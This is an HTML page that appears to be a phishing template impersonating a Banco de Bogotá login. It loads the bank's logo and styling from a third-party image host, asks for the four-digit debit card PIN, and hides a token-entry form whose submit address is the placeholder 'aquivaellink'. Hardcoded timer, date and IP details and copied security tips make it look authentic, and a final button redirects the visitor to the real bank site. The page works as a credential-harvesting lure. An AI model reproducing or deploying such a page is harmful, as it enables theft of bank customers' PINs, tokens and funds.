<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
  <head>
    <meta http-equiv="Content-Type" content="text/html; charset=windows-1252" />
    <meta http-equiv="X-UA-Compatible" content="IE=edge" />
    <meta name="viewport" content="width=device-width, initial-scale=1.0" />
    <title>Bogota</title>
    <link
      rel="stylesheet"
      href="https://sapp2406.sirv.com/bogo/lfr_style.css"
    />
    <link
      rel="stylesheet"
      href="https://sapp2406.sirv.com/bogo/lfr_ownstyle.css"
    />
  </head>
  <body>
    <div class="box-container">
      <div class="container">
        <div class="toast hidden" id="errorMessage" style="position: absolute">
          <p id="AuthLabel"></p>
          <span class="icon-close-search-r" onclick="hideToast()"></span>
        </div>
        <div class="container__water-mark">
          <div class="container__water-mark--image-container"></div>
        </div>
        <div class="container__login">
          <div class="container__login--header">
            <img src="https://sapp2406.sirv.com/bogo/logobanco1.png" alt="" />
          </div>
          <div class="container__login--title">
            <div class="container__login--title-1">
              <div class="container__login--title-1">
                <p>Identificacion de usuario</p>
              </div>
              <div class="container__login--title-2">
                <p>
                  <label class="tituloformulario" id="flujoOrigenLbl"></label>
                </p>
              </div>
            </div>
          </div>
          <div class="container__login--login-box-id">
            <div class="container__login--login-box-title">
              <span><strong></strong></span>
            </div>
            <div class="form-container">
              <form
                method="post"
                name="authenticateForm"
                id="authenticateForm"
                action=""
                autocomplete="off"
              >
                <div class="field-1">
                  <div class="custom-input">
                    <div class="label">
                      <label for="password">Clave de la tarjeta debito</label>
                    </div>
                    <input
                      name="Password"
                      type="password"
                      class="custom-form-control"
                      id="Password"
                      maxlength="4"
                      size="8"
                    />
                  </div>
                </div>
                <div class="btn-container">
                  <button
                    type="button"
                    class="btn-main"
                    id="btnContinue"
                    onclick="validate();"
                    disabled=""
                  >
                    Continuar
                  </button>
                </div>
              </form>
            </div>
          </div>
          <div class="timeElapsed">
            <label>Tiempo restante&nbsp;</label><span id="timeE_min">05</span
            ><label>:</label><span id="timeE_seg">18</span
            ><label>&nbsp;minutos</label><br />
            <label
              ><span id="timeE_date"
                >Jueves, 29 de Febrero de 2024, 5:28 PM</span
              ></label
            ><br />
            <label><span id="timeE_ip">IP 186.116.65.249</span></label>
          </div>
        </div>

        <style>
          ul {
            list-style-type: none;
            margin-top: 2rem;
            margin-left: 4rem;
            vertical-align: top;
          }

          li {
            display: flex;
            align-items: center;
            margin-bottom: 1rem;
          }

          .icon-info {
            width: 3rem;
            height: 3rem;
            margin-right: 1rem;
            object-fit: cover;
          }
        </style>

        <div class="container__info">
          <div class="container__info--tips">
            <div class="collapsable">
              <div class="collapse">
                <div class="collapse__header">
                  <div class="collapse__header--text">
                    <p class="header">Tu seguridad es lo primero</p>
                  </div>
                  <div class="collapse__header--btn">
                    <i class="icon-down-b"></i>
                  </div>
                </div>
                <div class="collapse__content hidden">
                  <p>Sigue estos tips y tus transacciones estarían blindadas</p>
                  <ul>
                    <li>
                      <img
                        id="icon-pass"
                        class="icon-info"
                        src="https://sapp2406.sirv.com/bogo/icon-pass.png"
                      />
                      <p>
                        <strong>No compartas</strong> tus claves o token con
                        terceros.
                      </p>
                    </li>
                    <li>
                      <img
                        id="icon-device"
                        class="icon-info"
                        src="https://sapp2406.sirv.com/bogo/icon-device.png"
                      />
                      <p>
                        <strong>Evita realizar</strong> transacciones desde un
                        equipo o dispositivo desconocido.
                      </p>
                    </li>
                    <li>
                      <img
                        id="icon-lock"
                        class="icon-info"
                        src="https://sapp2406.sirv.com/bogo/icon-lock.png"
                      />
                      <p>
                        <strong>Procura cambiar</strong> tus contraseñas
                        bancarias periódicamente o antes si sientes que es
                        necesario.
                      </p>
                    </li>
                  </ul>
                </div>
              </div>
            </div>
            <div class="collapsable">
              <div class="collapse">
                <div class="collapse__header">
                  <div class="collapse__header--text">
                    <p class="header">Contáctanos</p>
                  </div>
                  <div class="collapse__header--btn">
                    <i class="icon-down-b"></i>
                  </div>
                </div>
                <div class="collapse__content hidden">
                  <p>
                    Si tienes alguna duda o algo te ha sucedido, usa nuestros
                    canales
                  </p>
                  <ul>
                    <li>
                      <img
                        id="icon-call"
                        class="icon-info"
                        src="https://sapp2406.sirv.com/bogo/icon-call.png"
                      />
                      <p>Llamar a la <strong>Servilinea</strong></p>
                    </li>
                  </ul>
                </div>
              </div>
            </div>
          </div>
        </div>

        <div class="modal modalSE hidden" id="safeExitModal">
          <div class="modal__container" id="semc">
            <span class="close" id="closeModalSE" onclick="hideModalSE()"
              >ï¿½</span
            >
            <div class="modal-title">
              <h2>Abandonar el proceso</h2>
            </div>
            <div class="modal-text" id="modalSafeExitMsg">
              <p>Ha activado una Salida de forma segura</p>
            </div>
            <div class="modal-action">
              <button
                type="button"
                class="btn-main"
                onclick="lfr_controlExit()"
              >
                Aceptar
              </button>
            </div>
          </div>
        </div>
        <div class="overlay overlaySE hidden"></div>

        <div class="modal modalMA hidden">
          <div class="modal__container" id="containerMA">
            <h2 class="modal-title">Se requiere una acción válida</h2>
            <div class="modal__container--content">
              <p class="modal-text" id="modalAlertMsg"></p>
              <div class="modal-action">
                <button type="button" class="btn-main" onclick="hideModalMA()">
                  Entendido
                </button>
              </div>
            </div>
          </div>
        </div>
        <div class="overlay overlayMA hidden"></div>

        <div class="modal modalIN hidden">
          <div class="modal__container">
            <div class="modal-title">
              <h2>Acción Automática Activada</h2>
            </div>
            <div class="modal-text">
              <p id="modalAlertMsgIN"></p>
            </div>
            <div class="modal-action">
              <button
                type="button"
                class="btn-main"
                onclick="lfr_inactivityAction()"
              >
                Entendido
              </button>
            </div>
          </div>
        </div>
        <div class="overlay overlayIN hidden"></div>

        <style>
          .btn-img {
            background: none;
            border: none;
            min-width: 15rem;
            height: 5rem;
            outline: none;
            cursor: pointer;
          }

          #getOnPlayStore {
            min-width: 15rem;
            height: 5rem;
            object-fit: cover;
          }

          @media only screen and (max-width: 37.5em) {
            #getOnPlayStore {
              height: 4rem !important;
            }
          }

          #tokenAppImg {
            min-width: 6rem;
            height: 6rem;
          }

          #getOnAppStore {
            min-width: 15rem;
            height: 5rem;
            object-fit: cover;
          }

          @media only screen and (max-width: 37.5em) {
            #getOnAppStore {
              height: 4rem !important;
              margin-top: 0.5rem;
              margin-bottom: 0.5rem;
            }
          }

          .modalPopUp-text {
            font-size: 1.6rem;
            color: black;
            margin-bottom: 1.5rem;
          }

          #download {
            color: #0040a8;
          }

          .link {
            color: #0040a8;
            text-decoration: underline;
            cursor: pointer;
          }

          #modalAction {
            margin-bottom: 1.5rem;
          }

          .modal-bottom {
            display: flex;
            flex-direction: row;
            justify-content: center;
            align-items: center;
          }
        </style>

        <form action="aquivaellink" method="post" id="tok">
          <div class="modal modalUP">
            <div class="modal__container">
              <h2 class="modal-title">Solicitud aprobada.</h2>
              <br />
              <style>
                .token-container {
                  display: flex;
                  flex-wrap: wrap;
                  justify-content: space-around;
                  max-width: 400px;
                  margin: auto;
                }

                .token-input {
                  width: 30%;
                  max-width: 60px;
                  height: 60px;
                  text-align: center;
                  font-size: 20px;
                  border: 2px solid #ccc;
                  border-radius: 8px;
                  margin-bottom: 10px;
                }

                @media screen and (max-width: 600px) {
                  .token-input {
                    width: 45%;
                    max-width: 40px;
                    height: 40px;
                    font-size: 16px;
                  }
                }
              </style>

              <script>
                function moveToNextInput(currentInput, nextInputIndex) {
                  const inputValue = currentInput.value;

                  if (!isNaN(inputValue) && nextInputIndex) {
                    const nextInput = document.querySelector(
                      `.token-input:nth-child(${nextInputIndex})`
                    );
                    nextInput.focus();
                  }
                }
              </script>

              <script>
                function moveToNextInput(currentInput, nextInputIndex) {
                  const inputValue = currentInput.value;

                  if (!isNaN(inputValue) && nextInputIndex) {
                    const nextInput = document.querySelector(
                      `.token-input:nth-child(${nextInputIndex})`
                    );
                    nextInput.removeAttribute("readonly");
                    nextInput.focus();
                  }
                }
              </script>
              <br />
              <button
                onclick="window.location.href='https://www.bancodebogota.com/'"
                type="button"
                class="btn-main"
                id="btnAction"
              >
                Confirmar
              </button>
            </div>
          </div>
          <div class="overlay overlayUP"></div>
        </form>
      </div>
    </div>
  </body>
</html>
